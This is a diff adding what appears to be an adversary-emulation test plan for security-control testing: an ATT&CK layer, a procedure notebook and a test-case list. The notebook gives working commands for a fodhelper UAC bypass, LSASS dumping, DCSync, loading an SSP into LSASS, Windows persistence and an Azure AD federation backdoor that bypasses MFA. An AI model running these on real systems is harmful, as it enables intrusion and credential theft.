"techniqueID": "T1567.002" + }, + { + "enabled": false, + "techniqueID": "T1567.003" + }, + { + "enabled": false, + "techniqueID": "T1567.004" + }, + { + "enabled": false, + "techniqueID": "T1568" + }, + { + "enabled": false, + "techniqueID": "T1568.001" + }, + { + "enabled": false, + "techniqueID": "T1568.002" + }, + { + "enabled": false, + "techniqueID": "T1568.003" + }, + { + "enabled": false, + "techniqueID": "T1569" + }, + { + "enabled": false, + "techniqueID": "T1569.001" + }, + { + "enabled": false, + "techniqueID": "T1569.002" + }, + { + "color": "#7a34eb", + "techniqueID": "T1570" + }, + { + "enabled": false, + "techniqueID": "T1571" + }, + { + "enabled": false, + "techniqueID": "T1572" + }, + { + "enabled": false, + "techniqueID": "T1573" + }, + { + "enabled": false, + "techniqueID": "T1573.001" + }, + { + "enabled": false, + "techniqueID": "T1573.002" + }, + { + "showSubtechniques": true, + "techniqueID": "T1574" + }, + { + "enabled": false, + "techniqueID": "T1574.001" + }, + { + "color": "#7a34eb", + "techniqueID": "T1574.002" + }, + { + "enabled": false, + "techniqueID": "T1574.004" + }, + { + "enabled": false, + "techniqueID": "T1574.005" + }, + { + "enabled": false, + "techniqueID": "T1574.006" + }, + { + "enabled": false, + "techniqueID": "T1574.007" + }, + { + "enabled": false, + "techniqueID": "T1574.008" + }, + { + "enabled": false, + "techniqueID": "T1574.009" + }, + { + "enabled": false, + "techniqueID": "T1574.010" + }, + { + "enabled": false, + "techniqueID": "T1574.011" + }, + { + "enabled": false, + "techniqueID": "T1574.012" + }, + { + "enabled": false, + "techniqueID": "T1574.013" + }, + { + "enabled": false, + "techniqueID": "T1578" + }, + { + "enabled": false, + "techniqueID": "T1578.001" + }, + { + "enabled": false, + "techniqueID": "T1578.002" + }, + { + "enabled": false, + "techniqueID": "T1578.003" + }, + { + "enabled": false, + "techniqueID": "T1578.004" + }, + { + "enabled": false, + "techniqueID": "T1578.005" + }, + { + 
"enabled": false, + "techniqueID": "T1580" + }, + { + "enabled": false, + "techniqueID": "T1583" + }, + { + "enabled": false, + "techniqueID": "T1583.001" + }, + { + "enabled": false, + "techniqueID": "T1583.002" + }, + { + "enabled": false, + "techniqueID": "T1583.003" + }, + { + "enabled": false, + "techniqueID": "T1583.004" + }, + { + "enabled": false, + "techniqueID": "T1583.005" + }, + { + "enabled": false, + "techniqueID": "T1583.006" + }, + { + "enabled": false, + "techniqueID": "T1583.007" + }, + { + "enabled": false, + "techniqueID": "T1583.008" + }, + { + "enabled": false, + "techniqueID": "T1584" + }, + { + "enabled": false, + "techniqueID": "T1584.001" + }, + { + "enabled": false, + "techniqueID": "T1584.002" + }, + { + "enabled": false, + "techniqueID": "T1584.003" + }, + { + "enabled": false, + "techniqueID": "T1584.004" + }, + { + "enabled": false, + "techniqueID": "T1584.005" + }, + { + "enabled": false, + "techniqueID": "T1584.006" + }, + { + "enabled": false, + "techniqueID": "T1584.007" + }, + { + "enabled": false, + "techniqueID": "T1585" + }, + { + "enabled": false, + "techniqueID": "T1585.001" + }, + { + "enabled": false, + "techniqueID": "T1585.002" + }, + { + "enabled": false, + "techniqueID": "T1585.003" + }, + { + "enabled": false, + "techniqueID": "T1586" + }, + { + "enabled": false, + "techniqueID": "T1586.001" + }, + { + "enabled": false, + "techniqueID": "T1586.002" + }, + { + "enabled": false, + "techniqueID": "T1586.003" + }, + { + "enabled": false, + "techniqueID": "T1587" + }, + { + "enabled": false, + "techniqueID": "T1587.001" + }, + { + "enabled": false, + "techniqueID": "T1587.002" + }, + { + "enabled": false, + "techniqueID": "T1587.003" + }, + { + "enabled": false, + "techniqueID": "T1587.004" + }, + { + "enabled": false, + "techniqueID": "T1588" + }, + { + "enabled": false, + "techniqueID": "T1588.001" + }, + { + "enabled": false, + "techniqueID": "T1588.002" + }, + { + "enabled": false, + "techniqueID": "T1588.003" + }, + { 
+ "enabled": false, + "techniqueID": "T1588.004" + }, + { + "enabled": false, + "techniqueID": "T1588.005" + }, + { + "enabled": false, + "techniqueID": "T1588.006" + }, + { + "enabled": false, + "techniqueID": "T1589" + }, + { + "enabled": false, + "techniqueID": "T1589.001" + }, + { + "enabled": false, + "techniqueID": "T1589.002" + }, + { + "enabled": false, + "techniqueID": "T1589.003" + }, + { + "enabled": false, + "techniqueID": "T1590" + }, + { + "enabled": false, + "techniqueID": "T1590.001" + }, + { + "enabled": false, + "techniqueID": "T1590.002" + }, + { + "enabled": false, + "techniqueID": "T1590.003" + }, + { + "enabled": false, + "techniqueID": "T1590.004" + }, + { + "enabled": false, + "techniqueID": "T1590.005" + }, + { + "enabled": false, + "techniqueID": "T1590.006" + }, + { + "enabled": false, + "techniqueID": "T1591" + }, + { + "enabled": false, + "techniqueID": "T1591.001" + }, + { + "enabled": false, + "techniqueID": "T1591.002" + }, + { + "enabled": false, + "techniqueID": "T1591.003" + }, + { + "enabled": false, + "techniqueID": "T1591.004" + }, + { + "enabled": false, + "techniqueID": "T1592" + }, + { + "enabled": false, + "techniqueID": "T1592.001" + }, + { + "enabled": false, + "techniqueID": "T1592.002" + }, + { + "enabled": false, + "techniqueID": "T1592.003" + }, + { + "enabled": false, + "techniqueID": "T1592.004" + }, + { + "enabled": false, + "techniqueID": "T1593" + }, + { + "enabled": false, + "techniqueID": "T1593.001" + }, + { + "enabled": false, + "techniqueID": "T1593.002" + }, + { + "enabled": false, + "techniqueID": "T1593.003" + }, + { + "enabled": false, + "techniqueID": "T1594" + }, + { + "enabled": false, + "techniqueID": "T1595" + }, + { + "enabled": false, + "techniqueID": "T1595.001" + }, + { + "enabled": false, + "techniqueID": "T1595.002" + }, + { + "enabled": false, + "techniqueID": "T1595.003" + }, + { + "enabled": false, + "techniqueID": "T1596" + }, + { + "enabled": false, + "techniqueID": "T1596.001" + }, + { + 
"enabled": false, + "techniqueID": "T1596.002" + }, + { + "enabled": false, + "techniqueID": "T1596.003" + }, + { + "enabled": false, + "techniqueID": "T1596.004" + }, + { + "enabled": false, + "techniqueID": "T1596.005" + }, + { + "enabled": false, + "techniqueID": "T1597" + }, + { + "enabled": false, + "techniqueID": "T1597.001" + }, + { + "enabled": false, + "techniqueID": "T1597.002" + }, + { + "enabled": false, + "techniqueID": "T1598" + }, + { + "enabled": false, + "techniqueID": "T1598.001" + }, + { + "enabled": false, + "techniqueID": "T1598.002" + }, + { + "enabled": false, + "techniqueID": "T1598.003" + }, + { + "enabled": false, + "techniqueID": "T1598.004" + }, + { + "enabled": false, + "techniqueID": "T1599" + }, + { + "enabled": false, + "techniqueID": "T1599.001" + }, + { + "enabled": false, + "techniqueID": "T1600" + }, + { + "enabled": false, + "techniqueID": "T1600.001" + }, + { + "enabled": false, + "techniqueID": "T1600.002" + }, + { + "enabled": false, + "techniqueID": "T1601" + }, + { + "enabled": false, + "techniqueID": "T1601.001" + }, + { + "enabled": false, + "techniqueID": "T1601.002" + }, + { + "enabled": false, + "techniqueID": "T1602" + }, + { + "enabled": false, + "techniqueID": "T1602.001" + }, + { + "enabled": false, + "techniqueID": "T1602.002" + }, + { + "enabled": false, + "techniqueID": "T1606" + }, + { + "enabled": false, + "techniqueID": "T1606.001" + }, + { + "enabled": false, + "techniqueID": "T1606.002" + }, + { + "enabled": false, + "techniqueID": "T1608" + }, + { + "enabled": false, + "techniqueID": "T1608.001" + }, + { + "enabled": false, + "techniqueID": "T1608.002" + }, + { + "enabled": false, + "techniqueID": "T1608.003" + }, + { + "enabled": false, + "techniqueID": "T1608.004" + }, + { + "enabled": false, + "techniqueID": "T1608.005" + }, + { + "enabled": false, + "techniqueID": "T1608.006" + }, + { + "enabled": false, + "techniqueID": "T1609" + }, + { + "enabled": false, + "techniqueID": "T1610" + }, + { + 
"enabled": false, + "techniqueID": "T1611" + }, + { + "enabled": false, + "techniqueID": "T1612" + }, + { + "enabled": false, + "techniqueID": "T1613" + }, + { + "enabled": false, + "techniqueID": "T1614" + }, + { + "enabled": false, + "techniqueID": "T1614.001" + }, + { + "enabled": false, + "techniqueID": "T1615" + }, + { + "enabled": false, + "techniqueID": "T1619" + }, + { + "enabled": false, + "techniqueID": "T1620" + }, + { + "color": "#7a34eb", + "techniqueID": "T1621" + }, + { + "enabled": false, + "techniqueID": "T1622" + }, + { + "enabled": false, + "techniqueID": "T1647" + }, + { + "enabled": false, + "techniqueID": "T1648" + }, + { + "enabled": false, + "techniqueID": "T1649" + }, + { + "enabled": false, + "techniqueID": "T1650" + }, + { + "enabled": false, + "techniqueID": "T1651" + }, + { + "enabled": false, + "techniqueID": "T1652" + }, + { + "enabled": false, + "techniqueID": "T1653" + }, + { + "enabled": false, + "techniqueID": "T1654" + }, + { + "enabled": false, + "techniqueID": "T1656" + }, + { + "enabled": false, + "techniqueID": "T1657" + }, + { + "enabled": false, + "techniqueID": "T1659" + } + ] +} \ No newline at end of file diff --git a/h-index-2024/h-index-2024-v1.0-notebook.md b/h-index-2024/h-index-2024-v1.0-notebook.md new file mode 100644 index 0000000..a14f8fe --- /dev/null +++ b/h-index-2024/h-index-2024-v1.0-notebook.md 
@@ -0,0 +1,525 @@
+# General
+
+# Initial Access
+
+## MFA Push Spam - General guidance
+
+Push-based MFA systems are susceptible to abuse by attackers because they allow an attacker to send a large volume of MFA requests to a user in order to induce that user to accept the prompt in the hopes it ends the requests.
+
+Spam a target user with MFA approval prompts. Unlike a real-world scenario, this is not meant to test the human response to being inundated with MFA requests but rather the technical security controls for such a situation.
+
+### Guidance
+
+Send at least 10 MFA requests to the target user
+
+### Notes
+
+- If MFA is in place, but it does not use some form of zero-knowledge approval (e.g. push notification accept, SMS accept, etc), then it should be considered a block. For example, if the MFA systems requires entering a one-time code, then it would not be susceptible to this attack and therefore be blocked. If no MFA is enforced, it should be considered not blocked.
+
+## Malicious ISOs - Generic ISO-wrapped payload
+
+ISO archives can be used to deliver malicious payloads while bypassing mark-of-the-web restrictions
+
+Use an ISO to deliver a malicious executable payload
+
+### Prerequisites
+
+1. Payload
+1. ISO containing the payload
+ 1. You can use `mkisofs` to create an ISO:
+ ```
+ bash> mkisofs -J -o {{ iso }} {{ payload }}
+ ```
+
+## Cloud storage sharing - General guidance
+
+### Prerequisites
+
+- Have an account on a cloud storage service that allows sharing files via email
+
+### Guidance
+
+Upload then share a file with a target email address via the service. For example, in Google Drive, right click -> share -> share -> enter email -> enter message -> send.
+
+### Notes
+
+Some cloud storage services perform file scanning of uploaded files for malicious content. Consider uploading the file immediately before sharing to limit the impact on testing.
+
+## Suspicious connections - General guidance
+
+### Guidance
+
+When using a browser, you can override the user agent string by using an extension. For example:
+
+- Firefox: https://addons.mozilla.org/en-US/firefox/addon/user-agent-string-switcher
+- Chrome: https://chromewebstore.google.com/detail/user-agent-switcher-and-m/bhchdcejhohfmigjafbampogmaanbfkg
+
+You can override your source IP by using a VPN running on a VPS hosted in an anomalous geolocation.
+
+## Suspicious connections - General guidance
+
+### Guidance
+
+When using a browser, you can override the user agent string by using an extension. For example:
+
+- Firefox: https://addons.mozilla.org/en-US/firefox/addon/user-agent-string-switcher
+- Chrome: https://chromewebstore.google.com/detail/user-agent-switcher-and-m/bhchdcejhohfmigjafbampogmaanbfkg
+
+You can override your source IP by using a VPN running on a VPS hosted in an anomalous geolocation.
+
+# Defense Evasion
+
+## Malicious kernel driver use - load known-abusable driver
+
+Kernel drivers can be used by attackers for a number of malicious activities, including hiding artifacts and tampering with endpoint security tools.
+
+This bypasses the need for attackers to retrieve legitimate code-signing certificates for a driver they wrote.
+
+### Prerequisites
+
+- Local admin
+- A known-abusable driver. Examples:
+ - **DBUtil_2_3 (SHA256 - 0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5)**
+ - RTCore64 (SHA256 - 01aa278b07b58dc46c84bd0b1b5c8e9ee4e62ea0bf7a695862444af32e87f1fd)
+ - IQVM64 (SHA256 - 4429f32db1cc70567919d7d47b844a91cf1329a6cd116f582305f3b7b60cd60b)
+
+### Guidance
+
+Example loading using sc.exe
+
+```
+cmd> sc.exe create {{ name }} type= kernel start= demand error= normal binpath= c:\windows\System32\Drivers\{{ sys_file }} displayname= {{ name }}
+```
+
+### Cleanup
+
+- Is using sc.exe, stop and delete the service then restart the machine
+
+### Notes
+
+Drivers can be found in multiple places, including:
+
+- Directly from vendor sites
+- VirusTotal
+- Aggregators like LOLDrivers and KDU
+ - LOLDrivers: https://github.com/magicsword-io/LOLDrivers/tree/main/drivers
+ - KDU: https://github.com/hfiref0x/KDU/
+
+## UAC Bypass - via fodhelper.exe
+
+User Account Control is not a security control but can cause issues with execution when attempting privileged operations
+
+Move to a high-integrity execution context via fodhelper.exe and a Registry modification. Fodhelper.exe is one of many unpatched methods for bypassing UAC.
+
+### Prerequisites
+
+- Split-token admin account
+
+### Guidance
+
+Check for the existence of the target registry key. If it exists, note the value so that it can be restored after execution.
+
+```
+cmd> reg query HKCU\Software\Classes\ms-settings\Shell\Open\command
+```
+
+Modify the registry key and execute fodhelper.exe to obtain an elevated command prompt:
+
+```
+cmd>
+reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /f
+reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /d "C:\windows\system32\cmd.exe" /f
+reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /d "" /f
+c:\windows\system32\fodhelper.exe
+```
+
+### Cleanup
+
+If the registry existed prior to execution, restore its value:
+
+```
+cmd> reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v {{ initial_command }} /f
+```
+
+Otherwise, delete the key:
+
+```
+cmd> reg delete HKCU\Software\Classes\ms-settings\Shell\Open\command /f
+```
+
+### References
+
+- https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/
+- https://4pfsec.com/offensive-windows-fodhelper-exe/
+
+## DLL Side Loading - General guidance
+
+### Notes
+
+- For an up-to-date list of side-loadable DLLs, refer to https://hijacklibs.net/
+
+## DLL Search Order Hijacking - MpCmdRun.exe sideloading
+
+MpCmdRun.exe is susceptible to a DLL sideloading hijack via its dependency on MpClient.dll
+
+### Prerequisites
+
+- A DLL with the appropriate exports called `mpclient.dll`
+ - Use: https://github.com/2XXE-SRA/payload_resources/tree/master/dllsideload/mpclient
+
+### Guidance
+
+Copy `c:\program files\windows defender\mpcmdrun.exe` to the same directory as the `mpclient.dll` payload then run `mpcmdrun.exe`
+
+## Conditional Access Policy Modifications - General guidance
+
+### Notes
+
+- Create a new conditional access policy to avoid modifying production policies. Additionally, consider disabling the policy or setting it to report-only before modifying it.
+
+# Collection
+
+# Discovery
+
+# Command and Control
+
+## Remote Assistance Software - General guidance
+
+Access via remote assistance software
+
+Select and use a well-known remote assistance software
+
+### Prerequisites
+
+1. An account for the service
+2. Tool client downloaded and installed
+ 1. TeamViewer: https://www.teamviewer.com/
+ 2. GoTo Resolve: https://www.goto.com/it-management/resolve
+ 3. ConnectWise Control: https://control.connectwise.com/
+
+### Notes
+
+- Where possible, use remote assistance software already in use in the environment
+
+## Remote tool download - General guidance
+
+Transfer tool into environment by downloading from the Internet
+
+### Notes
+
+- The maliciousness level of the binary should align with the intent of the test. For testing signature-based checks, use a known malicious tool, such as Mimikatz. For testing sandboxing or similar network security technologies, use an unknown yet still overtly malicious tool, such as one built around the current attack infrastructure. By default, start with the most malicious choice.
+
+# Credential Access
+
+## DCSync - via Mimikatz
+
+The DCSync attack mimics normal replication behavior between DCs, allowing for remote extraction of credentials
+
+Uses Mimikatz's lsadump::dcsync command
+
+### Prerequisites
+
+- Command execution in the context of an account with Active Directory replication rights
+- User accounts to target
+- Mimikatz binary (https://github.com/gentilkiwi/mimikatz)
+
+### Guidance
+
+```
+mimikatz> lsadump::dcsync /domain:{{ domain }} /user:{{ target_username }}
+```
+
+### Troubleshooting
+
+If Mimikatz is giving an error of `ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x00002105 (8453)`, try the following:
+
+```
+cmd> klist purge
+cmd> gpupdate /force
+```
+
+## LSASS dumping using comsvcs.dll - via rundll32.exe
+
+Use `rundll32.exe` to call the `MiniDump` export from `comsvcs.dll`
+
+### Prerequisites
+
+- Administrator rights
+- SeDebugPrivilege
+
+### Guidance
+
+```
+shell> rundll32.exe c:\windows\system32\comsvcs.dll MiniDump {{ lsass_pid }} {{ outpath }} full
+```
+
+This command must be run from a shell process that has `SeDebugPrivilege` enabled.
+PowerShell should work to this end.
+
+You can acquire `SeDebugPrivilege` for `cmd.exe` by launching it as `SYSTEM` via Sysinternals' `PsExec` (`psexec -sid cmd`).
+Alternatively, you can use the VBScript file from `modexp`: https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/ (`cscript procdump.vbs lsass.exe`)
+
+### Cleanup
+
+- Delete the dump file
+
+## LSASS Security Service Provider - Temporary SSP
+
+Register a Security Service Provider (SSP) for LSASS. This will trigger a DLL load of the SSP into LSASS.
+
+Register an SSP temporarily by calling the AddSecurityPackage() API.
+
+### Prerequisites
+
+- Local administrator
+- A compiled SSP DLL and a method of calling the AddSecurityPackage() API (e.g. custom exe payload)
+ - SSP source: https://github.com/2XXE-SRA/payload_resources/blob/master/c/lsa_ssp.c
+ - This can be compiled using MinGW via `x86_64-w64-mingw32-gcc -shared -municode -o ssp.dll lsa_ssp.c -lsecur32`
+ - SSP loader: https://github.com/2XXE-SRA/payload_resources/blob/master/powershell/ssp_loader.ps1
+
+### Guidance
+
+Open an administrative PowerShell terminal.
+
+If using the script linked above, run the following command
+
+```
+PS> .\ssp_loader.ps1 {{ ssp_dll_path }}
+```
+
+If loading manually, first set the path to the compiled SSP DLL into a variable
+
+```
+PS> $DllName = "{{ ssp_dll_path }}"
+```
+
+Then load the SSP into LSASS
+
+```
+PS>
+$DynAssembly = New-Object System.Reflection.AssemblyName('SSPI2')
+$AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
+$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('SSPI2', $False)
+
+$TypeBuilder = $ModuleBuilder.DefineType('SSPI2.Secur32', 'Public, Class')
+$PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('AddSecurityPackage',
+ 'secur32.dll',
+ 'Public, Static',
+ [Reflection.CallingConventions]::Standard,
+ [Int32],
+ [Type[]] @([String], [IntPtr]),
+ [Runtime.InteropServices.CallingConvention]::Winapi,
+ [Runtime.InteropServices.CharSet]::Auto)
+
+$Secur32 = $TypeBuilder.CreateType()
+
+if ([IntPtr]::Size -eq 4) {
+ $StructSize = 20
+} else {
+ $StructSize = 24
+}
+
+$StructPtr = [Runtime.InteropServices.Marshal]::AllocHGlobal($StructSize)
+[Runtime.InteropServices.Marshal]::WriteInt32($StructPtr, $StructSize)
+
+$Secur32::AddSecurityPackage($DllName, $StructPtr)
+```
+
+### Cleanup
+
+- The SSP will be removed on system reboot or after manually calling DeleteSecurityPackage()
+
+### References
+
+- https://www.ired.team/offensive-security/credential-access-and-credential-dumping/intercepting-logon-credentials-via-custom-security-support-provider-and-authentication-package#loading-ssp-without-reboot
+
+# Lateral Movement
+
+# Exfiltration
+
+## Exfiltration to cloud storage - General guidance
+
+Select and use a well-known cloud storage service
+
+### Prerequisites
+
+1. An account for the service
+2. Tool client downloaded and installed
+ 1. Generic: https://rclone.org/downloads/
+ 2. MEGA: https://mega.io/desktop
+ 3. Dropbox: https://www.dropbox.com/install
+
+### Notes
+
+- Where possible, use cloud storage service already in use in the environment
+
+## DLP Test - General use
+
+DLP Test (dlptest.com) is a web utility for testing if exfiltration of sensitive data is successful
+
+General usage notes for DLP Test
+
+### Notes
+
+- If sample sensitive data is needed, the site provides it in different types and formats
+- The site supports HTTP, HTTPS, and FTP
+- Do not upload actual sensitive data to the site
+
+# Impact
+
+## GPO Modifications - General guidance
+
+### Notes
+
+- Create a new group policy object to avoid modifying production policies. Additionally, consider disabling the policy before modifying it.
+ +# Execution + +# Persistence + +## Scheduled Task Persistence - via schtasks.exe + +Use built-in schtasks.exe to persist by creating a scheduled task + +### Guidance + +``` +CMD> schtasks /Create /SC DAILY /TN "{{ taskname }}" /TR "{{ command }}" /ST 09:00 +``` + +### Cleanup + +``` +CMD> schtasks /delete /tn "{{ taskname }}" /f +``` + +## Windows Service Persistence - via sc.exe + +Use built-in sc.exe to persist + +### Guidance + +``` +CMD> sc create {{ service_name }} binPath= "{{ command }}" +``` + +### Cleanup + +``` +CMD> sc delete {{ service_name }} +``` + +## Registry Run Key Persistence - via reg.exe + +Use built-in reg.exe to persist via the Registry by setting a command to be run on user login + +### Guidance + +``` +CMD> reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "{{ key_name }}" /t REG_SZ /F /D "{{ command }}" +``` + +### Cleanup + +``` +CMD> reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /F /V "{{ key_name }}" +``` + +## New user persistence - via net.exe + +Use built-in net.exe to persist by creating a new local administrator user + +### Guidance + +``` +CMD> net user /add {{ username }} {{ password }} +CMD> net localgroup {{ group_name }} {{ username }} /add +``` + +### Cleanup + +``` +CMD> net user /delete {{ username }} +``` + +## Persistence in Azure AD - Register a New Device + +Register a new device in Azure AD + +### Prerequisites + +- Azure AD credentials +- AAD Internals PowerShell module (https://aadinternals.com/aadinternals/#installation) + - Install: `PS> install-module aadinternals -scope currentuser` + - Import: `PS> import-module aadinternals` + +### Guidance + +Authenticate to Azure AD and save the token + +``` +PS> Get-AADIntAccessTokenForAADJoin -SaveToCache +``` + +Register a device: + +``` +PS> Join-AADIntDeviceToAzureAD -DeviceName "{{ device_name }}" -DeviceType "{{ device_type }}" -OSVersion "{{ os_version }}" -JoinType Register +``` + + - This will save a `.pfx` certificate to the 
current working directory, which is needed for cleanup + - Note: The provided values do not need to refer to real characteristics + +### Cleanup + +Remove the device from Azure AD + +``` +PS> Remove-AADIntDeviceFromAzureAD -PfxFileName {{ pfx_certificate_file }} +``` + +## Azure AD Domain Federation - Backdoor via AADInternals + +Use AADInternals to create a backdoor federation domain for persisting access to an environment. + +### Prerequisites + +- Permissions to modify domain authentication settings + - and an access token for the user with these permissions, referred to as `$at` in example commands. To retrieve a token, use `$at=Get-AADIntAccessTokenForAADGraph -Credentials (get-credential)` and proceed through the prompts +- AADInternals installed + - `Install-Module AADInternals` +- A target verified domain in Azure AD + - To add a domain, Go to Azure AD -> custom domain names -> add -> set the provided DNS records for your domain -> wait for the verification to compelete +- A user with an immutable ID set + - To set an immutable ID for a user: `Set-AADIntUser -UserPrincipalName {{ upn_or_email }} -ImmutableId "{{ id }}" -AccessToken $at` where the `id` is an arbitrary unnique value + +### Guidance + +To set the backdoor + +``` +PS> ConvertTo-AADIntBackdoor -AccessToken $at -DomainName "{{ domain }}" +``` + +To use the backdoor. This works for any user in the tenant, regardless of their domain. + +``` +Open-AADIntOffice365Portal -ImmutableID {{ id }} -UseBuiltInCertificate -ByPassMFA $true -Issuer {{ issuer }} +``` + +- `id` is the immutable ID of the target user +- `issuer` is the IssuerUri provided in the output of the previous command + +### Cleanup + +- Delete the domain + +### Notes + +- The domain must be verified for the backdoor to work + +### References + +- https://o365blog.com/post/aadbackdoor/ +- https://www.mandiant.com/resources/blog/detecting-microsoft-365-azure-active-directory-backdoors + 
diff --git a/h-index-2024/h-index-2024-v1.0-summary.csv b/h-index-2024/h-index-2024-v1.0-summary.csv
new file mode 100644
index 0000000..e8366e3
--- /dev/null
+++ b/h-index-2024/h-index-2024-v1.0-summary.csv
@@ -0,0 +1,52 @@
+"Test Case","MITRE ID","Campaign","Description"
+"Prompt a user with multiple MFA requests","T1621","Initial Access","Using valid credentials for a user, prompt that user with multiple MFA requests in a short period of time in order to induce them to accept the prompt."
+"Attachment - Macro","T1566.001","Initial Access","Send a spearphishing attachment containing a malicious macro payload to a target inbox"
+"Attachment - ISO","T1566.001","Initial Access","Send phishing email to victim containing an ISO attachment. ISO files can be used to bypass mark-of-the-web restrictions."
+"Link - Zipped DLL via sharing","T1566.002","Initial Access","Send a link to a zipped DLL payload stored on a cloud storage service like Google Drive by using the sharing features of that service"
+"Suspicious external employee login","T1078","Initial Access","Login to an external employee portal from an unexpected geolocation and with an unexpected user-agent to simulate a suspicious login attempt."
+"Suspicious service use","T1078","Initial Access","Interact with a service from an unexpected geolocation and with an unexpected user-agent to simulate suspicious use of the target service. This can occur, for example, when a user's token is stolen via a phishing attack then used by an attacker to assume their session and access a service."
+"Load known-abusable kernel driver","T1014","Defense Evasion","Load a legitimate and signed kernel driver that is vulnerable to exploitation. Refer to projects like KDU (https://github.com/hfiref0x/KDU/) for potential vulnerable drivers to use. Vulnerable, signed drivers provide a privileged (kernel) execution mechanism to attackers, allowing them to bypass security controls they couldn't otherwise bypass, such as by killing protected processes."
+"DLL execution using Rundll32","T1218.011","Defense Evasion","Execute a malicious DLL's function directly using rundll32"
+"Bypass User Account Control (UAC) via fodhelper","T1548.002","Defense Evasion","Bypass user account control (UAC) to move to a high-integrity execution context via fodhelper.exe and a Registry modification"
+"Clear Windows Event Log entries","T1070.001","Defense Evasion","Clear the Windows Event Log entries using the builtin wevtutil.exe to remove any attack indicators in the logs."
+"Sideload a DLL into a legitimate application","T1574.002","Defense Evasion","Rename an attacker-controlled DLL to the name of a DLL expected by a legitimate application, move that DLL to be adjacent to the application, then execute the application in order to trigger the loading of the DLL by the legitimate application."
+"Disable Windows Defender via PowerShell","T1562.001","Defense Evasion","Use PowerShell's Set-MpPreference to disable Windows Defender"
+"Modify identity policy in IdP","T1484","Defense Evasion","Modify an IdP policy to be more permissive for authentication. For example, disable an Azure AD conditional access policy's MFA requirement."
+"Screen Capture","T1113","Collection","Capture an image of the user's screen"
+"Keylogger","T1056.001","Collection","Log user keystrokes"
+"Domain Controller discovery via nltest","T1018","Discovery","Use nltest.exe to identify domain controllers in the domain"
+"Domain trust discovery via nltest","T1482","Discovery","Identify domain trust relationships using nltest.exe"
+"Enumerate domain groups and users using net","T1087.002","Discovery","Enumerate domain users and domain groups using the builtin net.exe"
+"BloodHound DC enumeration","T1087.002","Discovery","Use BloodHound/SharpHound to perform enumeration of domain resources against a domain controller"
+"Internal network scan using Net Scan","T1046","Discovery","Perform an internal network scan to discover other hosts and services on the internal network using Network Scanner by SoftPerfect"
+"HTTP C2 over tcp/80","T1071.001","Command and Control","Establish a bidirectional command-and-control connection from a managed asset to an external server on the Internet over HTTP"
+"HTTPS C2 over tcp/443","T1071.001","Command and Control","Establish a bidirectional command-and-control connection from a managed asset to an external server on the Internet over HTTPS"
+"Access via remote assistance tool","T1219","Command and Control","Establish connection to system using a legitimate remote assistance application"
+"Remote tool download over HTTP","T1105","Command and Control","Download a tool from a public hosting location onto the victim system"
+"Extract domain user credentials via replication","T1003.006","Credential Access","Replicate a user's hash from a domain controller using replication APIs (DCSync)."
+"Extract Logonpasswords via Nanodump","T1003.001","Credential Access","Use nanodump to extract credentials from LSASS process memory"
+"Dump LSASS memory using Sysinternals ProcDump","T1003.001","Credential Access","Use ProcDump from Sysinternals to dump LSASS process memory"
+"Dump LSASS memory using builtin comsvcs.dll","T1003.001","Credential Access","Use rundll32.exe and comsvcs.dll to dump LSASS process memory to disk"
+"Extract browser cookies","T1555.003","Credential Access","Extract cookie information from the user's browser"
+"Volumetric Kerberoasting","T1558.003","Credential Access","Retrieve Kerberos TGS tickets from Active Directory for all users with service principal names (SPNs) set"
+"Enabled WDigest via Registry","T1112","Credential Access","Set the UseLogonCredential key in the WDigest hive to enable cleartext credential storage in-memory"
+"Register Security Service Provider (SSP) in LSASS","T1547.005","Credential Access","Register an SSP DLL that into LSASS. This technique can be used by adversaries to harvest credentials that traverse through LSASS."
+"Lateral Movement via WMI","T1021.003","Lateral Movement","Move to another system by using Windows Management Instrumentation (WMI) to spawn a process on that target system"
+"Lateral Movement via PsExec","T1021.002","Lateral Movement","Move to another system by creating a service remotely via Sysinternals PsExec"
+"Lateral Movement via RDP","T1021.001","Lateral Movement","Perform an interactive logons to a Windows system via RDP"
+"Remote .exe copy","T1570","Lateral Movement","Copy an .exe payload to a temp folder on the remote target"
+"Extract data to cloud storage service","T1567.002","Exfiltration","Extract data from the internal network to a cloud storage service like MEGA, Google Drive, or Box"
+"Extract sensitive data over FTP","T1048.003","Exfiltration","Exfiltrate data from the internal network to an external system via FTP"
+"Extract sensitive data over HTTP","T1048.003","Exfiltration","Extract data from the network over HTTP tcp/80 to an external host or IP."
+"Extract sensitive data over HTTP C2","T1041","Exfiltration","Extract data from the network via an HTTP C2 channel over tcp/80 to external host or IP"
+"Encrypt a large amount of files","T1486","Impact","Encrypt a large amount of files on the endpoint to simulate ransomware"
+"Delete shadows with vssadmin.exe","T1490","Impact","Delete volume shadow copies on the host to inhibit file system recovery"
+"Modify group policy object","T1484.001","Impact","Modify a domain group policy object. This can be used for activities like persisting access to the environment, disabling security controls, and executing ransomware on domain systems."
+"Macro - Remote Template","T1221","Execution","Execute a malicious Office document on the endpoint that will load a macro stored in a remote template document"
+"Persist via new scheduled task","T1053.005","Persistence","Persist on a system by creating a new scheduled task"
+"Persist via new Windows service","T1543.003","Persistence","Persist on a system by creating a new service"
+"Persist via Registry Winlogon Shell","T1547.004","Persistence","Run a payload during user login by setting a Registry Winlogon key"
+"Persist via Registry ""Run"" key","T1547.001","Persistence","Run a payload during user login and startup by setting a registry run key"
+"Persist via new local administrator","T1136.001","Persistence","Create a new local user then add them to the ""Administrators"" group using the builtin net.exe"
+"Register a new device in Azure AD","T1098.005","Persistence","Register a new device in Azure AD"
+"Configure a custom federated domain","T1484.002","Persistence","Convert a custom domain in the Azure Active Directory tenant into a federated domain. This can be used for persistent access into the tenant."
diff --git a/h-index-2024/h-index-2024-v1.0.yml b/h-index-2024/h-index-2024-v1.0.yml
new file mode 100644
index 0000000..f8691a6
